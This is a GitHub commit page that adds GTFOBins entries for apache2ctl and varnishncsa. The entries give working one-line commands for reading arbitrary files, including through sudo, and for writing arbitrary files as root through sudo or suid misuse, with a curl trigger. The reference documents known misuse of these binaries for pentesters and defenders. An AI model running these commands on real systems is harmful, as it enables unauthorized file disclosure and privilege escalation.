Skip to content

Commit

Permalink
Add varnishncsa and apache2ctl
Browse files Browse the repository at this point in the history
  • Loading branch information
@cyrus-and
cyrus-and authored Dec 23, 2023
2 parents 6696d46 + 914c850 commit e986b31
Show file tree
Hide file tree
Showing 2 changed files with 29 additions and 0 deletions.
12 changes: 12 additions & 0 deletions _gtfobins/apache2ctl.md
View file
Original file line number Diff line number Diff line change
@@ -0,0 +1,12 @@
---
description: This includes the file in the actual configuration file, the first line is leaked as an error message.
functions:
file-read:
- code: |
LFILE=file_to_read
apache2ctl -c "Include $LFILE" -k stop
sudo:
- code: |
LFILE=file_to_read
sudo apache2ctl -c "Include $LFILE" -k stop
---
17 changes: 17 additions & 0 deletions _gtfobins/varnishncsa.md
View file
Original file line number Diff line number Diff line change
@@ -0,0 +1,17 @@
---
description: |
This allows to write arbitrary files as root, provided that the proper HTTP response is made. Specifically the content of a certain header will be written in the file. First start `varnishncsa` as follows, then trigger the file write with:
```
curl -H 'yyy: DATA' http://localhost:6081/xxx
```
functions:
sudo:
- code: |
LFILE=file_to_write
sudo varnishncsa -g request -q 'ReqURL ~ "/xxx"' -F '%{yyy}i' -w "$LFILE"
suid:
- code: |
LFILE=file_to_write
./varnishncsa -g request -q 'ReqURL ~ "/xxx"' -F '%{yyy}i' -w "$LFILE"
---

0 comments on commit e986b31

Please sign in to comment.